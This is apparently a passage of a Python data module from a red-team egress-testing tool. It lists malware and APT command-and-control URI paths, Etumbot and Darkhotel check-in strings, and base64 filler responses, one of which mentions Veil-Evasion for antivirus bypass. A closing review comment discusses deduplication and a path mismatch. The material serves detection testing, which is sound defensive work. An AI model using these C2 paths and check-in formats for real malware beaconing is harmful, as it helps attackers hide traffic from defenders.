'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
|
||||
'/administrator/modules/mod_menu/help/config.jpg',
|
||||
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
|
||||
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
|
||||
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
|
||||
'/forum.php', '/config.php', '/wp-blog/gate.php',
|
||||
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
|
||||
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
|
||||
'/images/outl.jpg', '/images/smilies/raye.jpg',
|
||||
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
|
||||
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
|
||||
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
|
||||
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
|
||||
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
|
||||
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
|
||||
'/plugins/system/bot.exe', '/plugins/system/config.bin',
|
||||
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
|
||||
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
|
||||
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
|
||||
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
|
||||
'/katolog/thumbs/panel/config.jpg',
|
||||
'/katolog/thumbs/panel/gate.php', '/home/index.asp?typeid=13']
|
||||
|
||||
other_apt_uris = [
|
||||
'/search5', '/microsoft/errorpost/default.aspx?ID=',
|
||||
'/MicrosoftUpdate/ShellEX/KB', '/MicrosoftUpdate/WWRONG/KB',
|
||||
'/MicrosoftUpdate/GetFiles/KB', '/MicrosoftUpdate/GetUpdate/KB']
|
||||
|
||||
etumbot_checkin = '/home/index.asp/typeid=13'
|
||||
etumbot_checkin_response = 'AQAAAAAAAABlNjV3YjI0bjUAAAAAAAAAAAAAAG5FAVBvIz8hYk08ITI4BA0lMTBvBRx0NB18BndMcFMKQhR5PxxkQ3VnFEALeXA6C3RPBmJLHBBccHQINEl9I3kMUk0lOT4wCFgqD3khTjl5IEAqGzU_DmtUeEJBYSQHEiwRADteMEFjTw5oXgtjGkUxL14JPlwyYQQXPkVaQiAyUBEaJWlkOQEmZRoXZ10EN3RndH0kbEErew0NUklhFRlpNDJofS1hPQMCeWUvHSQPA2ZAPHEcCRkLPURbCC8bdTgIXXcIBhBbVlhjdB8iL2Y_TCNldTNjZkEvB0M5BWtaOkBALj4KIA5UBjhVPxhhSk1fAwdKKi8zdhl6TkthRUZAOQdICRgFEgY0dwpQNjtlQgR8DzM9N3NQBhteHgdwaVtycDZvS1Q3CTYhARI1GBMrWh1FQxcdQhV7MSx'
|
||||
etumbot_uri = '/history/'
|
||||
etumbot_uri2 = '/image/'
|
||||
etumbot_uri3 = '/article/30441/Review.asp?'
|
||||
etumbot_uri4 = '/manage/asp/item.asp?id='
|
||||
etumbot_uri5 = '/tech/s.asp?m='
|
||||
etumbot_extensions = '.jpg'
|
||||
etumbot_extensions2 = '.asp'
|
||||
|
||||
encoded_response = [
|
||||
'dGhpc2lzZ29pbmd0b2JlIGEgcmVhbGx5IGJpZyByZXNwb25zZSBob3BlZnVsbHkuICBXZSByZWFsbHkgd2FudCB0aGVyZSB0byBiZSBhIGxvdCBvZiBkYXRhIHNvIHRoYXQgSSBjYW4gc2ltbGF0ZSB0aGUgd2ViIHJlc3BvbnNlIGJlaW5nIEMyIGNvbW1hbmRzIGZyb20gdGhlIHV0dW1ib3Qgc2VydmVyLiAgSSBkbyBub3Qga25vdyB3aGF0IGlzIGdvaW5nIHRvIGhhcHBlbiwgYnV0IEkgd2lsbCBjb250aW51ZSB0byB0cnkgdG8gZGV2ZWxvcCBhIGxvdCBvZiBtYWx3YXJlIG1vZHVsZSBmb3IgZWdyZXNzLWFzc2Vzcy4gIGl0IGhhcyBiZWVuIGEgbG90IG9mIGZ1bg--',
|
||||
'SSBhbSBnb2luZyB0byBjb250aW51ZSB0byBkZXZlbG9wIGVncmVzcy1hc3Nlc3MgbW9kdWxlcyBhbmQgdGhpcyBpcyBnb2luZyB0byBiZSBvbmUgb2YgdGhlbS4gIFRoZSBpbml0aWFsIHJlbGVhc2UgZm9yIHRoZXNlIG1hbHdhcmUgYW5kIEFQVCBncm91cCBtb2R1bGVzIGlzIGdvaW5nIHRvIGJlIGF0IFNBTlMgSEFDS0ZFU1QgaW4gd2FzaGluZ3RvbiBEQy4gIElmIHlvdSBhcmUgd2FudGluZyB0byBnZXQgdGhlIGxhdGVzdCBlZ3Jlc3MtYXNzZXNzIG1vZHVsZXMgdGhlIGVhcmxpZXN0IHRoYXQgeW91IGNhbiwgYmUgc3VyZSB0byBnZXQgdGhlcmUgYXQgSEFDS0ZFU1QgYW5kIHNlZSBzdGV2ZSBhbmQgSSB0YWxrLg--',
|
||||
'U3RldmUgaXMgdGhlIG1hbiwgYW5kIGhhcyBiZWVuIGdyZWF0IHRvIHdvcmsgd2l0aCBvbiBFZ3Jlc3MtQXNzZXNzLiAgSGUgd2FzIGFjdHVhbGx5IHRoZSBvbmUgd2hvIGNhbWUgdXAgd2l0aCB0aGUgaWRlYSBvZiBoYXZpbmcgdXMgZW11bGF0ZSBkaWZmZXJlbnQgcGllY2VzIG9mIG1hbHdhcmUgb3IgaGFja2luZyBncm91cHMuICBXZSB0YWxrZWQgYWJvdXQgaXQgYW5kIHRob3VnaHQgaXQgd2FzIGEgZ3JlYXQgaWRlYSwgc28gaGVyZSB3ZSBhcmUh',
|
||||
'VGhpcyBpcyBwcm9iYWJseSB0aGUgY2xvc2VzdCB0aGluZyB0byBhbiBlYXN0ZXIgZWdnIHRoYXQgd2UgaGF2ZSBjdXJyZW50bHkgaW4gRWdyZXNzLUFzc2Vzcy4gIFRoZXJlIGlzIG5vdCBhIGxvdCBvZiBvdGhlciBhcmVhcyB3aGVyZSBhbnl0aGluZyBjb3VsZCByZWFsbHkgYmUgaGlkZGVuIHdpdGhpbiB0aGlzIHByb2dyYW0sIGJ1dCBpdCB3b3VsZCBiZSBraW5kIG9mIGZ1bm55IHRvIGhlYXIgaWYgYW55b25lIGVsc2UgYWN0dWFsbHkgZmluZHMgdGhpcyBkYXRhLg--',
|
||||
'T25lIHRoaW5nIHRoYXQgSSBkZWZpbml0ZWx5IGhhdmUgbGVhcm5lZCBpcyB0aGF0IGl0IGlzIGhhcmQgdG8gd29yayBvbiB3cml0aW5nIGRpZmZlcmVudCBzb2Z0d2FyZSBhbmQgaGF2ZSB0d28ga2lkcyBhdCB0aGUgc2FtZSB0aW1lLiAgSG9wZWZ1bGx5IEkgd2lsbCBiZSBhYmxlIHRvIGRvIHRoaXMsIGJ1dCBpdCB3aWxsIGJlIGEgbG90IGZhc3RlciBvbmNlIHRoZSBraWRzIGdldCBhIGxpdHRsZSBiaXQgb2xkZXIgYW5kIEkgY2FuIHRoZW4gc3BlbmQgbW9yZSB0aW1lIG9uIHRoaXMu',
|
||||
'U28gZmFyLCB3ZSBkbyBub3QgYWN0dWFsbHkgaGF2ZSBhbnlvbmUgdGhhdCBoYXMgc3VibWl0dGVkIGFueSBwdWxsIHJlcXVlc3RzIHRvIEVncmVzcy1Bc3Nlc3MuICBXZSBkZWZpbml0ZWx5IHRoaW5rIGl0IHdvdWxkIGJlIGF3ZXNvbWUgaWYgc29tZW9uZSBlbHNlIGFkZGVkIHNvbWUgZmVhdHVyZXMgdG8gRWdyZXNzLUFzc2Vzcywgb3Igc2VuZCB1cyBtb2R1bGVzIHNvIHRoYXQgd2UgY2FuIGdldCBpdCBhZGRlZCBpbiB0byB0aGUgdG9vbCE-',
|
||||
'VGhpcyB3aWxsIG1ha2UgbGlmZSBlYXN5LCBob3BlZnVsbHkgZXZlcnlvbmUgaXMgYWJsZSB0byB1c2UgdGhpcyB0b29sIHRvIHRlc3QgaWYgdGhlaXIgbmV0d29ya3MgYWN0dWFsbHkgY2F0Y2ggYW55IG9mIHRoZSBkYXRhIGxlYXZpbmcgdGhlaXIgbmV0d29yaywgb3IgYW55IG9mIHRoZSBwaWVjZXMgb2YgbWFsd2FyZSBvcGVyYXRpbmcgd2l0aGluIHRoZWlyIG5ldHdvcmsuICBZb3Ugc2hvdWxkIGFsbCB0ZXN0IGl0IG91dCBhbmQgc2VlIGlmIHlvdSBjYW4gY2F0Y2ggdGhpcyE-',
|
||||
'V2VsbCB0aGlzIGlzIGdvaW5nIHRvIGJlIHRoZSBsYXN0IGV0dW1ib3QgcmVzcG9uc2UgZm9yIG5vdy4gIElmIHNvbWVvbmUgZWxzZSBpcyBhY3R1YWxseSByZWFkaW5nIHRoZXNlLCB5b3Ugc2hvdWxkIGRlbW9uc3RyYXRlIHRoYXQgeW91IGhhdmUgcmVhZCB0aGVzZSBieSBhZGRpbmcgYSByZXNwb25zZSBzcGVjaWZpY2FsbHkgdGhpcyBldHVtYm90IHJlc3BvbnNlcy4gIEl0IHdpbGwgYmUgdGhpcyBsaXR0bGUgZWFzdGVyZWdnIDop',
|
||||
'SSB3b3VsZCByZWFsbHkgbGlrZSB0byB0aGluayB0aGF0IGF0IHNvbWUgcG9pbnQgSSBoYXZlIGdlbmVyYXRlZCBlbm91Z2ggb2YgdGhlc2UgZW5jb2RlZCBtb2R1bGVzLiAgSW4gdGhlIG1lYW50aW1lLCBzb21lIGZpbGxlciEgIFlvdSBndXlzIHNob3VsZCBiZSBzdXJlIHRvIGdvIHZpc2l0IG15IHdlYiBwYWdlIGF0IGNocmlzdG9waGVydHJ1bmNlci5jb20gYmVjYXVzZSBJIHRyeSB0byB3cml0ZSBzb21lIHVzZWZ1bCBhcnRpY2xlcyB0aGVyZSB0aGF0IGhlbHAgb3RoZXJzIGluIHRoZSBjb21tdW5pdHkh',
|
||||
'QW5kIHRoaXMgaXMgYWN0dWFsbHkgdGhlIGxhc3Qgb25lIHRoYXQgSSBhbSBtYWtpbmcuICBJZiB5b3UgZ3V5cyB3YW50IHRvIGxlYXJuIGhvdyB0byBieXBhc3MgYW50aXZpcnVzLCBlc3BlY2lhbGx5IHNpbmNlIGl0IHJlYWxseSBpcyBqdXN0IGEgam9rZSwgeW91IHNob3VsZCBiZSBzdXJlIHRvIHBsYXkgYXJvdW5kIHdpdGggVmVpbC1FdmFzaW9uIGFuZCBsZWFybiBob3cgdG8gdXNlIGl0IGF0IHZlaWwtZnJhbWV3b3JrLmNvbS4gIEkgaG9wZSB0aGF0IHRoYXQgaGVscHMh']
|
||||
|
||||
darkhotel_checkin = '/major/images/view.php'
|
||||
darkhotel_checkin2 = '/major/txt/read.php'
|
||||
darkhotel_uri = '/bin/read_i.php?a1='
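Review bot: `malware_uris` is only used for `in` membership tests by the request handler, yet it is a list with repeated entries (`'/sadcxvbv/vdfbffddf.php'`, `'/wqwcqqw/sasasacw.php'` and `'/panel/gate.php'` each appear three times, `'/images/gate.php'` four), so each lookup is a linear scan over duplicates; declaring it as `malware_uris = frozenset([ ... ])` deduplicates and makes the check O(1) without changing any caller. `etumbot_checkin = '/home/index.asp/typeid=13'` differs from the final `malware_uris` entry `'/home/index.asp?typeid=13'` only by `/` versus `?`; because the `in malware_uris` test runs first in do_GET, the check-in response is never served if the `?` form was the intended path, so the two should be reconciled deliberately. The module docstring could state that these are the request paths the web server emulation matches and which constants each actor module relies on.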
|